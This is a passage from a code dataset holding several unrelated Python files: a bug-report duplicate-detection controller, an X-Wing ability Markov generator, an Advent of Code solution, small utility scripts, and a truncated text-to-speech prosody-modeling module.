(TokenizedReport)\n Exceptions:\n NoReportsFound. 
If there are no reports in the database.\n Example:\n >>> reports = get_tokenized_reports()\n \"\"\"\n reports = TokenizedReport.get_reports(filters=filters, limit=limit) # May raise NoReportsFound\n return reports\n\n\ndef create_tokenized_report(report_id: int, creation_time: datetime,\n status: str, component: str, dupe_of: int,\n summary: str, comments: list, text:str, tokens:list) -> TokenizedReport:\n \"\"\"\n Create a report in the database.\n Args:\n report_id: id of the report.\n creation_time: creation time of the report.\n status: status of the report.\n component: component of the report.\n dupe_of: id of the report this is a duplicate of. None if not a duplicate.\n summary: summary of the report.\n comments: list of comments for the report.\n text: text of the report.\n tokens: list of tokens for the report.\n Returns:\n report:TokenizedReport report from the database.\n Exceptions:\n ReportAlreadyExists. If the report already exists.\n Example:\n >>> report = create_tokenized_report(report)\n \"\"\"\n report = TokenizedReport.insert(report_id, creation_time, \n status, component, dupe_of, \n summary, comments, text, tokens) # May raise ReportAlreadyExists\n return report\n\ndef create_many_tokenized_reports(reports: list) -> int:\n \"\"\"\n Create many reports in the database.\n Args:\n reports: list of reports (TokenizedReport)\n Returns:\n reports: number of reports created.\n Example:\n >>> reports = create_many_tokenized_reports([{'report_id': 1, 'creation_time': ...}, ...])\n \"\"\"\n inserted_reports = 0\n\n if reports:\n for rp in reports:\n report = TokenizedReport(**rp) if type(rp) == dict else rp\n try:\n create_tokenized_report(report.report_id, report.creation_time, \n report.status, report.component, report.dupe_of, \n report.summary, report.comments, report.text, report.tokens) # May raise ReportAlreadyExists\n inserted_reports += 1\n except ReportAlreadyExists:\n pass\n \n return inserted_reports\n\ndef update_tokenized_report(_id: int, report_id: int, creation_time: datetime,\n status: str, component: str, dupe_of: int,\n summary: str, comments: list, text: str, tokens: list) -> TokenizedReport:\n \"\"\"\n Update a report in the database.\n Args:\n _id: mongo id of the report.\n report_id: id of the report.\n creation_time: creation time of the report.\n status: status of the report.\n component: component of the report.\n dupe_of: id of the report this is a duplicate of. None if not a duplicate.\n summary: summary of the report.\n comments: list of comments for the report.\n text: text of the report.\n tokens: list of tokens for the report.\n Returns:\n report:TokenizedReport report from the database.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> report = update_report(12345, 657,...)\n \"\"\"\n report = TokenizedReport.update(_id, report_id, creation_time, \n status, component, dupe_of, \n summary, comments, text, tokens) # May raise ReportNotFound\n return report\n\ndef delete_tokenized_report(report_id: int) -> None:\n \"\"\"\n Delete a report from the database.\n Args:\n report_id: report_id of the report.\n Exceptions:\n ReportNotFound. 
If the report does not exist.\n Example:\n >>> delete_tokenized_report(12345)\n \"\"\"\n return TokenizedReport.delete(report_id=report_id) # May raise ReportNotFound\n\ndef delete_all_tokenized_reports() -> int:\n \"\"\"\n Delete all reports from the database.\n Returns:\n int: number of reports deleted.\n Example:\n >>> num_deleted = delete_all_tokenized_reports()\n \"\"\"\n return TokenizedReport.delete_all() # May raise NoReportsFound\n\ndef get_number_of_reports() -> int:\n \"\"\"\n Get the number of reports in the database.\n Returns:\n int: number of reports.\n Example:\n >>> num_reports = get_number_of_reports()\n \"\"\"\n return TokenizedReport.get_number_of_reports()\n\n###############################################################################\n\n# CLI Create Report\n\ndef get_highest_id() -> int:\n \"\"\"\n Get the highest report id in the database.\n Returns:\n int: highest report id.\n Example:\n >>> highest_id = get_highest_id()\n \"\"\"\n return TokenizedReport.get_highest_id()\n\ndef cli_get_possible_duplicates(component: str, summary: str, description: str, default_model: bool=True) -> tuple:\n \"\"\"\n Gets the similar report to the one is wanted to be stored.\n Uses SIDRD to get the possible duplicates\n Args:\n component: component of the report.\n summary: summary of the report.\n description: description of the report.\n default_model: if True, use the default model. If False, use the last trained model\n Returns:\n tuple: \n - report processed by SIDRD (TokenizedReport)\n - list of possible duplicates (dictionaries with report_id, component, summary, description, creation_time)\n Example:\n >>> report, similar_reports = cli_get_possible_duplicates('Core', 'Summary', 'Description')\n \"\"\"\n sidrd = SIDRD(default_model=default_model)\n highest_id = get_highest_id() # May raise NoReportsFound\n report = TokenizedReport(\n report_id=highest_id+1, creation_time=datetime.now(), status=\"NEW\", \n component=component, dupe_of=None, summary=summary, comments= description,\n text=\"\", tokens=[]\n )\n try:\n reports_to_compare = get_tokenized_reports(limit=0)\n except NoReportsFound:\n return report, []\n return sidrd.get_duplicates(report, reports_to_compare)\n\ndef cli_create_report(report: TokenizedReport, dupe_of: int) -> None:\n \"\"\"\n Create a report in the database.\n Args:\n report: report to be created (TokenizedReport)\n dupe_of: id of the report this is a duplicate of. 0 if not a duplicate.\n Exceptions:\n ReportAlreadyExists. 
If the report already exists.\n Example:\n >>> report = cli_create_report(report, dupe_of)\n \"\"\"\n if dupe_of == 0:\n dupe_of = None\n else:\n try:\n master = get_tokenized_report(report_id=dupe_of)\n dupe_of = master.report_id\n except ReportNotFound:\n pass # dupe_of = dupe_of\n\n report.dupe_of = dupe_of if dupe_of != 0 else None\n\n report = create_tokenized_report(\n report.report_id, report.creation_time, \n report.status, report.component, report.dupe_of, \n report.summary, report.comments, report.text, report.tokens) # May raise ReportAlreadyExists\n\n\ndef retrain_sidrd(config_path: str, verbose: bool = True) -> None:\n \"\"\"\n Retrain SIDRD with the new reports.\n Args:\n config_path: path to the config file.\n Example:\n >>> retrain_sidrd(config_path, True)\n \"\"\"\n sidrd = SIDRD()\n try:\n new_config = json.load(open(config_path))\n # TODO: The reports to retrain should be chosen after an analysis of the reports\n report_set = get_tokenized_reports(limit=0)\n sidrd.retrain(report_set, new_config, verbose)\n except FileNotFoundError:\n print(\"Config file not found\")\n\n","repo_name":"Alburrito/sidrd-project","sub_path":"backend/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":13363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"42"} +{"seq_id":"17591022025","text":"import os\nimport json\nimport random\n\nabilities = []\nmarkov = {}\nreplacements = [\n\t[\",\",\"\"],\n\t[\".\",\"\"],\n\t[\"[Bullseye Arc]\",\"[Bullseye-Arc]\"],\n\t[\"[Critical Hit]\",\"[Critical-Hit]\"],\n\t[\"[Left Arc]\",\"[Left-Arc]\"],\n\t[\"[Right Arc]\",\"[Right-Arc]\"],\n\t[\"[Single Turret Arc]\",\"[Single-Turret-Arc]\"],\n\t[\"[Front Arc]\",\"[Front-Arc]\"],\n\t[\"[Rear Arc]\",\"[Rear-Arc]\"],\n\t[\"[Full Front Arc]\",\"[Full-Front-Arc]\"],\n\t[\"[Full Rear Arc]\",\"[Full-Rear-Arc]\"],\n\t[\"([Segnor's Loop Left] or [Segnor's Loop Right])\",\"\"],\n\t[\"([Turn Left] or [Turn Right])\",\"\"],\n\t[\"[[Tallon Roll Left] or [Tallon Roll Right]]\",\"\"],\n\t[\"[Bank Left]\",\"[Bank-Left]\"],\n\t[\"[Bank Left]\",\"[Bank-Right]\"],\n\t[\"[Turn Left]\",\"[Turn-Left]\"],\n\t[\"[Turn Right]\",\"[Turn-Right]\"],\n]\nfirst_word_totals = {}\nfirst_words = []\nfirstWordKey = \"FIIIIRSTWOOOROD\"\nlastWordKey = \"LAAAASTWOOOORD\"\n\ndef create_random_ability():\n\tline = []\n\tword = random.choice(first_words)\n\twhile word != lastWordKey:\n\t\tline.append(word)\n\t\tif word in markov:\n\t\t\tword_choices = []\n\t\t\tword_weights = []\n\t\t\tfor next_word in markov[word]:\n\t\t\t\tif(next_word != firstWordKey):\n\t\t\t\t\tword_choices.append(next_word)\n\t\t\t\t\tword_weights.append(markov[word][next_word])\n\t\t\tword = random.choices(word_choices, word_weights)[0]\n\t\telse:\n\t\t\tword = lastWordKey\n\tprint(\" \".join(line))\n\ndef convert_markov_to_probabilities():\n\tfor word in markov:\n\t\ttotal = 0\n\t\tfor next_word in markov[word]:\n\t\t\tif(next_word == firstWordKey):\n\t\t\t\tfirst_word_totals[word] = markov[word][next_word]\n\t\t\t\tfirst_words.append(word)\n\t\t\telse:\n\t\t\t\ttotal += markov[word][next_word]\n\t\tfor next_word in markov[word]:\n\t\t\tif(next_word != firstWordKey):\n\t\t\t\tmarkov[word][next_word] = markov[word][next_word] / total\n\ndef process_abilities():\n\tfor line in abilities:\n\t\tfor replacement in replacements:\n\t\t\tline = line.replace(replacement[0], replacement[1])\n\t\tsplitLine = line.split(\" \")\n\t\tindex = 0\n\t\twhile index < len(splitLine):\n\t\t\tprocess_ability_line(index, 
splitLine)\n\t\t\tindex += 1\n\ndef process_ability_line(index, wordArray):\n\tword = wordArray[index]\n\tfirstWord = index == 0\n\tlastWord = index == len(wordArray) - 1\n\tif lastWord:\n\t\tif word not in markov:\n\t\t\tmarkov[word]={lastWordKey:1}\n\t\telse:\n\t\t\tif lastWordKey in markov[word]:\n\t\t\t\tmarkov[word][lastWordKey] += 1\n\t\t\telse:\n\t\t\t\tmarkov[word][lastWordKey] = 1\n\t\treturn\n\tnextWord = wordArray[index + 1]\n\tif word not in markov:\n\t\tmarkov[word] = {nextWord:1}\n\t\tif firstWord:\n\t\t\tmarkov[word][firstWordKey] = 1\n\telse:\n\t\tif nextWord in markov[word]:\n\t\t\tmarkov[word][nextWord] += 1\n\t\telse:\n\t\t\tmarkov[word][nextWord] = 1\n\t\tif firstWord:\n\t\t\tif firstWordKey in markov[word]:\n\t\t\t\tmarkov[word][firstWordKey] += 1\n\t\t\telse:\n\t\t\t\tmarkov[word][firstWordKey] = 1\n\ndef process_file(file):\n\topenfile = open(file)\n\tloadedjson = json.load(openfile)\n\tif \"pilots\" not in loadedjson:\n\t\treturn\n\tfor pilot in loadedjson[\"pilots\"]:\n\t\tif \"ability\" in pilot:\n\t\t\tabilities.append(pilot[\"ability\"])\n\ndef process_directory(directory):\n\tfor r, d, f in os.walk(directory):\n\t\tfor subdirectory in d:\n\t\t\tprocess_directory(subdirectory)\n\t\tfor file in f:\n\t\t\tif file.endswith(\".json\"):\n\t\t\t\tprocess_file(os.path.join(r, file))\n\ndef main():\n\tthisdir = os.getcwd()\n\tprocess_directory(thisdir)\n\tprocess_abilities()\n\twith open('abilities.txt', mode='wt', encoding='utf-8') as myfile:\n\t\tmyfile.write('\\n'.join(abilities))\n\twith open('markov.json', 'w') as fp:\n\t\tjson.dump(markov, fp)\n\tconvert_markov_to_probabilities()\n\tval = 100\n\twhile val > 0:\n\t\tcreate_random_ability()\n\t\tval -= 1\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"achapin/xwing-pilot-ability-markov","sub_path":"xwing-markov.py","file_name":"xwing-markov.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"32728114700","text":"with open('input.txt') as f:\r\n s = f.read().split(',')\r\n\r\narr = [int(i) for i in s]\r\ndp = [0]*9\r\n\r\nfor i in arr:\r\n dp[i] += 1\r\n \r\nfor _ in range(256):\r\n \r\n new_dp = dp[:]\r\n for i in range(9):\r\n if i == 8:\r\n new_dp[8] = dp[0]\r\n elif i == 6:\r\n new_dp[6] = dp[7] + dp[0]\r\n else:\r\n new_dp[i] = dp[i+1]\r\n \r\n dp = new_dp[:]\r\n\r\nprint(sum(dp))","repo_name":"manialm/advent-of-code","sub_path":"2021/6/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"31886704187","text":"import string\nimport random\n\ndef gen():\n dic = \"\"\n ll = [\"a-z\", \"A-Z\", \"0-9\", \"@-#\"]\n \n for i in range(5):\n choice = random.choice(ll)\n if (choice == \"a-z\"):\n dic += string.ascii_lowercase\n elif (choice == \"A-Z\"):\n dic += string.ascii_uppercase\n elif (choice == \"0-9\"):\n dic += string.digits\n elif (choice == \"@-#\"):\n dic += string.punctuation\n \n return dic\n\ndef main():\n print(gen())\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xandeft/GAK","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27078598221","text":"#!/usr/bin/python\n# coding=utf-8\nfrom utils.readExcel import *\nimport json\nfrom utils.logger import Log\nfp = excel_path('test_datas.xlsx')\nlogger = 
Log(logger='get_params').get_log()\n\n\ndef get_params(sheet, case):\n \"\"\"\n 获取请求参数\n :param sheet: sheet name\n :param case: 用例名\n :return:\n \"\"\"\n index = 0\n # 获取当前用例所在行下标\n col_case = col_value(fp, sheet, 1)\n for i in range(len(col_case)):\n if col_case[i] == case:\n index = i\n break\n params = cell_value(fp, sheet, index+1, 3)\n # print(params)\n # print(type(params))\n # if type(params) == str or type(params) == bytes or type(params) == bytearray:\n try:\n params = json.loads(params)\n finally:\n return params\n\n\ndef get_resp_params(sheet, case, resp_key):\n \"\"\"\n 获取响应参数\n :param resp_key: 响应名\n :param sheet: sheet name\n :param case: 用例名\n :return:\n \"\"\"\n index = 0\n param_key = row_value_by_casename(fp, sheet, 'case_name')\n param_value = row_value_by_casename(fp, sheet, case)\n for i in range(len(param_key)):\n if param_key[i] == resp_key:\n index = i\n break\n return param_value[index]\n\n\ndef get_url(sheet, case):\n \"\"\"\n 获取响应参数\n :param url_key: 字段名\n :param sheet: sheet name\n :param case: 用例名\n :return:\n \"\"\"\n index = 0\n param_key = row_value_by_casename(fp, sheet, 'case_name')\n param_value = row_value_by_casename(fp, sheet, case)\n # 获取 url 列的下标\n for i in range(len(param_key)):\n if param_key[i] == 'url':\n index = i\n break\n return param_value[index]\n\n\nif __name__ == '__main__':\n\n # req = get_req_params('cms_login', 'login_Sucess')\n # resp_c = get_resp_params('cms_login', 'login_Sucess', 'code')\n # resp_m = get_resp_params('cms_login', 'login_Sucess', 'msg')\n # print(req)\n # print(resp_c, resp_m)\n # url = get_url('cms_login', 'login_Sucess')\n # print(url)\n a = get_params('members', 'vipBeyRecords')\n print(a)\n print(type(a))\n","repo_name":"wang806/hopsapi_test","sub_path":"utils/getParams.py","file_name":"getParams.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27069306962","text":"import cv2\nimport numpy as np\n\n\ndef click(event, x, y, flag, params):\n if event == cv2.EVENT_LBUTTONDOWN:\n print('a')\n\n\ncv2.namedWindow('control')\nsrc = cv2.imread('../Images/downtown.png')\nsrc2 = cv2.imread('../Images/face2.png')\nsrc3 = cv2.imread('../Images/skull.png')\nsrc4 = cv2.imread('../Images/apple.png')\nsrc5 = cv2.imread('../Images/hat.png')\n\nsrc = cv2.resize(src, (400, 400))\nsrc2 = cv2.resize(src2, (100, 100))\nsrc3 = cv2.resize(src3, (100, 100))\nsrc4 = cv2.resize(src4, (100, 100))\nsrc5 = cv2.resize(src5, (100, 100))\n\nhs = np.hstack((src2, src3, src4, src5))\nvs = np.vstack((src, hs))\n\ncv2.imshow('control', vs)\ncv2.setMouseCallback('control', click)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"le2dy/OpenCV","sub_path":"testroom/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"25092700224","text":"import os\nimport json\nimport copy\nimport math\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nfrom numba import jit, prange\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom utils.tools import (\n get_variance_level,\n get_phoneme_level_pitch,\n get_phoneme_level_energy,\n get_mask_from_lengths,\n pad_1D,\n pad,\n dur_to_mel2ph,\n)\nfrom utils.pitch_tools import f0_to_coarse, denorm_f0, cwt2f0_norm\nfrom .transformers.blocks import (\n Embedding,\n SinusoidalPositionalEmbedding,\n LayerNorm,\n LinearNorm,\n ConvNorm,\n ConvBlock,\n 
ConvBlock2D,\n)\nfrom .transformers.transformer import ScaledDotProductAttention\nfrom .coordconv import CoordConv2d\n\n\n@jit(nopython=True)\ndef mas_width1(attn_map):\n \"\"\"mas with hardcoded width=1\"\"\"\n # assumes mel x text\n opt = np.zeros_like(attn_map)\n attn_map = np.log(attn_map)\n attn_map[0, 1:] = -np.inf\n log_p = np.zeros_like(attn_map)\n log_p[0, :] = attn_map[0, :]\n prev_ind = np.zeros_like(attn_map, dtype=np.int64)\n for i in range(1, attn_map.shape[0]):\n for j in range(attn_map.shape[1]): # for each text dim\n prev_log = log_p[i - 1, j]\n prev_j = j\n\n if j - 1 >= 0 and log_p[i - 1, j - 1] >= log_p[i - 1, j]:\n prev_log = log_p[i - 1, j - 1]\n prev_j = j - 1\n\n log_p[i, j] = attn_map[i, j] + prev_log\n prev_ind[i, j] = prev_j\n\n # now backtrack\n curr_text_idx = attn_map.shape[1] - 1\n for i in range(attn_map.shape[0] - 1, -1, -1):\n opt[i, curr_text_idx] = 1\n curr_text_idx = prev_ind[i, curr_text_idx]\n opt[0, curr_text_idx] = 1\n return opt\n\n\n@jit(nopython=True, parallel=True)\ndef b_mas(b_attn_map, in_lens, out_lens, width=1):\n assert width == 1\n attn_out = np.zeros_like(b_attn_map)\n\n for b in prange(b_attn_map.shape[0]):\n out = mas_width1(b_attn_map[b, 0, : out_lens[b], : in_lens[b]])\n attn_out[b, 0, : out_lens[b], : in_lens[b]] = out\n return attn_out\n\n\nclass PostNet(nn.Module):\n \"\"\"\n PostNet: Five 1-d convolution with 512 channels and kernel size 5\n \"\"\"\n\n def __init__(\n self,\n n_mel_channels=80,\n postnet_embedding_dim=512,\n postnet_kernel_size=5,\n postnet_n_convolutions=5,\n ):\n\n super(PostNet, self).__init__()\n self.convolutions = nn.ModuleList()\n\n self.convolutions.append(\n nn.Sequential(\n ConvNorm(\n n_mel_channels,\n postnet_embedding_dim,\n kernel_size=postnet_kernel_size,\n stride=1,\n padding=int((postnet_kernel_size - 1) / 2),\n dilation=1,\n w_init_gain=\"tanh\",\n ),\n nn.BatchNorm1d(postnet_embedding_dim),\n )\n )\n\n for i in range(1, postnet_n_convolutions - 1):\n self.convolutions.append(\n nn.Sequential(\n ConvNorm(\n postnet_embedding_dim,\n postnet_embedding_dim,\n kernel_size=postnet_kernel_size,\n stride=1,\n padding=int((postnet_kernel_size - 1) / 2),\n dilation=1,\n w_init_gain=\"tanh\",\n ),\n nn.BatchNorm1d(postnet_embedding_dim),\n )\n )\n\n self.convolutions.append(\n nn.Sequential(\n ConvNorm(\n postnet_embedding_dim,\n n_mel_channels,\n kernel_size=postnet_kernel_size,\n stride=1,\n padding=int((postnet_kernel_size - 1) / 2),\n dilation=1,\n w_init_gain=\"linear\",\n ),\n nn.BatchNorm1d(n_mel_channels),\n )\n )\n\n def forward(self, x):\n x = x.contiguous().transpose(1, 2)\n\n for i in range(len(self.convolutions) - 1):\n x = F.dropout(torch.tanh(self.convolutions[i](x)), 0.5, self.training)\n x = F.dropout(self.convolutions[-1](x), 0.5, self.training)\n\n x = x.contiguous().transpose(1, 2)\n return x\n\n\nclass ProsodyExtractor(nn.Module):\n \"\"\" Prosody Extractor \"\"\"\n\n def __init__(self, n_mel_channels, d_model, kernel_size):\n super(ProsodyExtractor, self).__init__()\n self.d_model = d_model\n self.conv_stack = nn.Sequential(\n ConvBlock2D(\n in_channels=1,\n out_channels=self.d_model,\n kernel_size=kernel_size,\n ),\n ConvBlock2D(\n in_channels=self.d_model,\n out_channels=1,\n kernel_size=kernel_size,\n ),\n )\n self.gru = nn.GRU(\n input_size=n_mel_channels,\n hidden_size=self.d_model,\n batch_first=True,\n bidirectional=True,\n )\n\n def get_prosody_embedding(self, mel):\n \"\"\"\n mel -- [B, mel_len, n_mel_channels], B=1\n h_n -- [B, 2 * d_model], B=1\n \"\"\"\n x = 
self.conv_stack(mel.unsqueeze(-1)).squeeze(-1)\n _, h_n = self.gru(x)\n h_n = torch.cat((h_n[0], h_n[1]), dim=-1)\n return h_n\n\n def forward(self, mel, mel_len, duration, src_len):\n \"\"\"\n mel -- [B, mel_len, n_mel_channels]\n mel_len -- [B,]\n duration -- [B, src_len]\n src_len -- [B,]\n batch -- [B, src_len, 2 * d_model]\n \"\"\"\n batch = []\n for m, m_l, d, s_l in zip(mel, mel_len, duration, src_len):\n b = []\n for m_p in torch.split(m[:m_l], list(d[:s_l].int()), dim=0):\n b.append(self.get_prosody_embedding(m_p.unsqueeze(0)).squeeze(0))\n batch.append(torch.stack(b, dim=0))\n\n return pad(batch)\n\n\nclass MDN(nn.Module):\n \"\"\" Mixture Density Network \"\"\"\n\n def __init__(self, in_features, out_features, num_gaussians):\n super(MDN, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.num_gaussians = num_gaussians\n self.w = nn.Sequential(\n nn.Linear(in_features, num_gaussians),\n nn.Softmax(dim=-1)\n )\n self.sigma = nn.Linear(in_features, out_features * num_gaussians)\n self.mu = nn.Linear(in_features, out_features * num_gaussians)\n\n def forward(self, x):\n \"\"\"\n x -- [B, src_len, in_features]\n w -- [B, src_len, num_gaussians]\n sigma -- [B, src_len, num_gaussians, out_features]\n mu -- [B, src_len, num_gaussians, out_features]\n \"\"\"\n B, src_len, _ = x.shape\n w = self.w(x)\n sigma = torch.exp(self.sigma(x))\n sigma = sigma.view(B, src_len, self.num_gaussians, self.out_features)\n mu = self.mu(x)\n mu = mu.view(B, src_len, self.num_gaussians, self.out_features)\n return w, sigma, mu\n\n\nclass ProsodyPredictor(nn.Module):\n \"\"\" Prosody Predictor \"\"\"\n\n def __init__(self, d_model, kernel_size, num_gaussians, dropout):\n super(ProsodyPredictor, self).__init__()\n self.d_model = d_model\n self.conv_stack = nn.ModuleList(\n [\n ConvBlock(\n in_channels=self.d_model,\n out_channels=self.d_model,\n kernel_size=kernel_size[i],\n dropout=dropout,\n normalization=nn.LayerNorm,\n transpose=True,\n )\n for i in range(2)\n ]\n )\n self.gru_cell = nn.GRUCell(\n self.d_model + 2 * self.d_model,\n 2 * self.d_model,\n )\n self.gmm_mdn = MDN(\n in_features=2 * self.d_model,\n out_features=2 * self.d_model,\n num_gaussians=num_gaussians,\n )\n\n def init_state(self, x):\n \"\"\"\n x -- [B, src_len, d_model]\n p_0 -- [B, 2 * d_model]\n self.gru_hidden -- [B, 2 * d_model]\n \"\"\"\n B, _, d_model = x.shape\n p_0 = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n self.gru_hidden = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n return p_0\n\n def forward(self, h_text, mask=None):\n \"\"\"\n h_text -- [B, src_len, d_model]\n mask -- [B, src_len]\n outputs -- [B, src_len, 2 * d_model]\n \"\"\"\n x = h_text\n for conv_layer in self.conv_stack:\n x = conv_layer(x, mask=mask)\n\n # Autoregressive Prediction\n p_0 = self.init_state(x)\n\n outputs = [p_0]\n for i in range(x.shape[1]):\n p_input = torch.cat((x[:, i], outputs[-1]), dim=-1) # [B, 3 * d_model]\n self.gru_hidden = self.gru_cell(p_input, self.gru_hidden) # [B, 2 * d_model]\n outputs.append(self.gru_hidden)\n outputs = torch.stack(outputs[1:], dim=1) # [B, src_len, 2 * d_model]\n\n # GMM-MDN\n w, sigma, mu = self.gmm_mdn(outputs)\n if mask is not None:\n w = w.masked_fill(mask.unsqueeze(-1), 0 if self.training else 1e-9) # 1e-9 for categorical sampling\n sigma = sigma.masked_fill(mask.unsqueeze(-1).unsqueeze(-1), 0)\n mu = mu.masked_fill(mask.unsqueeze(-1).unsqueeze(-1), 0)\n\n return w, sigma, mu\n\n @staticmethod\n def sample(w, sigma, mu, 
mask=None):\n \"\"\" Draw samples from a GMM-MDN \n w -- [B, src_len, num_gaussians]\n sigma -- [B, src_len, num_gaussians, out_features]\n mu -- [B, src_len, num_gaussians, out_features]\n mask -- [B, src_len]\n output -- [B, src_len, out_features]\n \"\"\"\n from torch.distributions import Categorical\n batch = []\n for i in range(w.shape[1]):\n w_i, sigma_i, mu_i = w[:, i], sigma[:, i], mu[:, i]\n ws = Categorical(w_i).sample().view(w_i.size(0), 1, 1)\n # Choose a random sample, one randn for batch X output dims\n # Do a (output dims)X(batch size) tensor here, so the broadcast works in\n # the next step, but we have to transpose back.\n gaussian_noise = torch.randn(\n (sigma_i.size(2), sigma_i.size(0)), requires_grad=False).to(w.device)\n variance_samples = sigma_i.gather(1, ws).detach().squeeze()\n mean_samples = mu_i.detach().gather(1, ws).squeeze()\n batch.append((gaussian_noise * variance_samples + mean_samples).transpose(0, 1))\n output = torch.stack(batch, dim=1)\n if mask is not None:\n output = output.masked_fill(mask.unsqueeze(-1), 0)\n return output\n\n\nclass ReferenceEncoder(nn.Module):\n \"\"\" Reference Mel Encoder \"\"\"\n\n def __init__(self, preprocess_config, model_config):\n super(ReferenceEncoder, self).__init__()\n\n E = model_config[\"transformer\"][\"encoder_hidden\"]\n n_mel_channels = preprocess_config[\"preprocessing\"][\"mel\"][\"n_mel_channels\"]\n ref_enc_filters = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_filters\"]\n ref_enc_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_size\"]\n ref_enc_strides = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_strides\"]\n ref_enc_pad = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_pad\"]\n ref_enc_gru_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_gru_size\"]\n\n self.n_mel_channels = n_mel_channels\n K = len(ref_enc_filters)\n filters = [1] + ref_enc_filters\n # Use CoordConv at the first layer to better preserve positional information: https://arxiv.org/pdf/1811.02122.pdf\n convs = [CoordConv2d(in_channels=filters[0],\n out_channels=filters[0 + 1],\n kernel_size=ref_enc_size,\n stride=ref_enc_strides,\n padding=ref_enc_pad, with_r=True)]\n convs2 = [nn.Conv2d(in_channels=filters[i],\n out_channels=filters[i + 1],\n kernel_size=ref_enc_size,\n stride=ref_enc_strides,\n padding=ref_enc_pad) for i in range(1,K)]\n convs.extend(convs2)\n self.convs = nn.ModuleList(convs)\n self.bns = nn.ModuleList(\n [nn.BatchNorm2d(num_features=ref_enc_filters[i]) for i in range(K)])\n\n out_channels = self.calculate_channels(n_mel_channels, 3, 2, 1, K)\n self.gru = nn.GRU(input_size=ref_enc_filters[-1] * out_channels,\n hidden_size=ref_enc_gru_size,\n batch_first=True)\n\n def forward(self, inputs, mask=None):\n \"\"\"\n inputs --- [N, Ty/r, n_mels*r]\n outputs --- [N, E//2]\n \"\"\"\n N = inputs.size(0)\n out = inputs.view(N, 1, -1, self.n_mel_channels) # [N, 1, Ty, n_mels]\n for conv, bn in zip(self.convs, self.bns):\n out = conv(out)\n out = bn(out)\n out = F.relu(out) # [N, 128, Ty//2^K, n_mels//2^K]\n\n out = out.transpose(1, 2) # [N, Ty//2^K, 128, n_mels//2^K]\n T = out.size(1)\n N = out.size(0)\n out = out.contiguous().view(N, T, -1) # [N, Ty//2^K, 128*n_mels//2^K]\n if mask is not None:\n out = out.masked_fill(mask.unsqueeze(-1), 0)\n\n self.gru.flatten_parameters()\n memory, out = self.gru(out) # memory --- [N, Ty, E//2], out --- [1, N, E//2]\n\n return memory, out.squeeze(0)\n\n def calculate_channels(self, L, kernel_size, stride, pad, n_convs):\n for i 
in range(n_convs):\n L = (L - kernel_size + 2 * pad) // stride + 1\n return L\n\n\nclass PhonemeLevelProsodyEncoder(nn.Module):\n \"\"\" Phoneme-level Prosody Encoder \"\"\"\n\n def __init__(self, preprocess_config, model_config):\n super(PhonemeLevelProsodyEncoder, self).__init__()\n\n self.E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.d_q = self.d_k = model_config[\"transformer\"][\"encoder_hidden\"]\n bottleneck_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_p\"]\n ref_enc_gru_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_gru_size\"]\n ref_attention_dropout = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_attention_dropout\"]\n\n self.encoder = ReferenceEncoder(preprocess_config, model_config)\n self.linears = nn.ModuleList([\n LinearNorm(in_dim, self.E, bias=False)\n for in_dim in (self.d_q, self.d_k)\n ])\n self.encoder_prj = nn.Linear(ref_enc_gru_size, self.E * 2)\n self.dropout = nn.Dropout(ref_attention_dropout)\n self.encoder_bottleneck = nn.Linear(self.E, bottleneck_size)\n\n def forward(self, x, text_lengths, src_mask, mels, mels_lengths, mel_mask):\n '''\n x --- [N, seq_len, encoder_embedding_dim]\n mels --- [N, Ty/r, n_mels*r], r=1\n out --- [N, seq_len, bottleneck_size]\n attn --- [N, seq_len, ref_len], Ty/r = ref_len\n '''\n embedded_prosody, _ = self.encoder(mels, mel_mask)\n\n # Bottleneck\n embedded_prosody = self.encoder_prj(embedded_prosody)\n\n # Obtain k and v from prosody embedding\n k, v = torch.split(embedded_prosody, self.E, dim=-1) # [N, Ty, E] * 2\n\n # Get attention mask\n src_len, mel_len = x.shape[1], mels.shape[1]\n text_mask = src_mask.unsqueeze(-1).expand(-1, -1, mel_len) # [batch, seq_len, mel_len]\n mels_mask = mel_mask.unsqueeze(1).expand(-1, src_len, -1) # [batch, seq_len, mel_len]\n\n # Attention\n q, k = [linear(vector) for linear, vector in zip(self.linears, (x, k))]\n attn = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(self.d_k) # [N, seq_len, ref_len]\n attn = attn.masked_fill(mels_mask, -np.inf)\n attn = self.dropout(F.softmax(attn, dim=-1))\n attn = attn.masked_fill(text_mask, 0.)\n out = self.encoder_bottleneck(torch.bmm(attn, v)) # [N, seq_len, bottleneck_size]\n out = out.masked_fill(src_mask.unsqueeze(-1), 0.)\n\n return out, attn\n\n\nclass STL(nn.Module):\n 